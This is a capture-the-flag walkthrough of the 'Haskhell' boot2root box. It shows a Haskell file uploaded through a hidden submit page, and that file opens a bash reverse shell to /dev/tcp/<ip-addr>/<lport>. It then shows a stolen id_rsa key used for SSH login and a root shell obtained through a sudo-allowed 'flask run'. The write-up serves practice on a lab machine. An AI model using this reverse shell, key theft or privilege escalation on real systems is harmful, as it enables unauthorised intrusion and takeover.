Introduction
Haskhell is another boot2root box, needs a little bit of enumeration a bit of enthusiasm to explore new things.
Haskell is one thing that needs to be explored for initial footholds, for those who don’t have any prior knowledge about it, Haskell is purely a functional programming language.
The other is to know a bit about python to get onto root user. ssh will be one another friend being a bridge in between to get on to root.
Scanning
Let’s get onto the box and start with initial nmap scan.
nmap -v -sV -sC <ip-addr>
Nmap gives us 2 ports i.e port 22 (ssh) and port 5001(Gunicorn).
Having Gunicorn running on a port in itself shows that there some python based web is hosted (either flask or Django).
Enumeration
Walking through the web page we found some interesting things.
1. Functional programming language Heskell
2. There is an upload section and uploaded files are automatically executed. let’s go get a Heskell reverse shell so that we can have a shell connection on our machine.
But the page linked here is not available.
Hmm!! stuck at this situation we couldn’t find any upload section on the page, so let’s try to find any hidden directories if exists.
Holla !! there we go “submit” the one we are looking for.
Exploitation
Let’s Upload reverse shell script and get initial shell on our machine.
import System.Process
main = do
callCommand “bash -c ‘bash -i >& /dev/tcp/<ip-addr>/<lport> 0>&1’ ”
Boom here we have the shell, heading towards /home and looking into user files we got the user flag in there with one of the user.
Further more as we know port 22 was open so we’ll try to get ssh creds or if we can find id_rsa file for the user prof.
The more you enumerate the more you succeed, Here we go, found ssh id_rsa file. there on we copied the content in a file in our own system.
Change file permissions to connect using ssh.
chmod 600 <id_rsa_file>
ssh -i <id_rsa_file> prof@<machine-ip>
Done with the stuff we got into another more privileged user “prof”.
check for if any sudo operation is allowed for this user.
And there is one. have a look in the image below.
Here we can see flask in one sudo operation we can run from this user, and on the other we know that flask is a python framework.
so lets have a python script to get root shell.
import pty; pty.spawn(“/bin/bash”)
export FLASK_APP=exploit.py
sudo /usr/bin/flask run
TAAAADDDDAAA prompted to root shell.
